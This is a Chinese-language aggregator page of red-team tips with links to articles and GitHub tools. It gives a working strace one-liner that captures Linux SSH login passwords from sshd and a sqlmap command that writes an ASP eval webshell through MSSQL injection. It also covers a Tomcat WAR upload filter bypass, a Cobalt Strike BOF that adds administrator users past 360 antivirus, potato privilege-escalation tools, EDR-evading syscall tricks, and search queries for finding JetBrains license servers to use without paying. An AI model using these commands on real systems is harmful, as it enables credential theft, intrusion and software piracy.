Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
聊聊那些红队攻击中的"奇技淫巧"
1.如何窃取Linux登录的账号密码
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log
2.不出网的Mssql注入(中文目录写webshell)
上传一个bat文件并执行
python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.bat
bat的内容为
echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp
3.Tomcat后台上传WAR包过滤该如何绕过
将文件后缀修改为xxx.w\\\ar

https://mp.weixin.qq.com/s?__biz=Mzg3NDk3NzMwNw==&mid=2247483836&idx=1&sn=f899bf5f453cff4517e8815b9ea16747
WEB安全
JetBrains IntelliJ 系列全家桶激活服务器查找小姿势
如果你不想使用任何的破解程序去激活你的JB家的东西,那么白嫖或许会成为你的不二之选。
在线收集版 但是很多都用不了,只能慢慢尝试
使用FOFA
"Location: https://account.jetbrains.com/fls-auth?uid"
使用Hunter
header="Location: https://account.jetbrains.com/fls-auth?uid"

https://mp.weixin.qq.com/s/T63wEpZk0mzNdJMzoQMUwA
终端对抗
据说能过360添加用户的BOF

beacon> help adduserbysamr
Use: adduserbysamr [username] [password] [groupName]
e.g: adduserbysamr sysadmin p@ssw0rd
     adduserbysamr sysadmin p@ssw0rd Administrators
     adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"

Add a user to localgroup by samr, groupName is "Administrators" by default, do not use it at AD.
唯一的问题是,360会有痕迹

https://github.com/AgeloVito/adduserbysamr-bof
内网渗透
PySQLTools
SharpSQLTOOLs多了一些土豆,两者相辅相成吧,会很不错
clr_efspotato {cmd}           - exec by EfsPotato like clr_exec
clr_badpotato {cmd}           - exec by BadPotato like clr_exec
clr_godpotato {cmd}           - exec by GodPotato like clr_exec
SharpSQLTools
多了一个BeiChen的GodPotato

https://github.com/Ridter/PySQLTools
终端对抗
另一种syscall
优点:解决了程序用了indirect syscall时候直接去ntdll.dll调用syscall指令的问题
这里我感觉就是找到kernel32的ADD RSP,68;RE指令以后,做了一个堆栈欺骗的操作把,调用完成后返回到这个指令的地址
而且这样用硬件断点结合VEH,去实时更改上下文寄存器直接更改几个syscall用到的rip、rax、r10,也不用我们自己构造stub存放在程序中了(构造stub还存在一个stub特征,混淆后还需要在text段涉及一个virtualprotect的调用问题)
代码非常不错,看完可以学一下硬件断点这个操作,当然只需要学习其优点,其中的get SSN 方法就中规中矩了

https://github.com/ASkyeye/HWSyscalls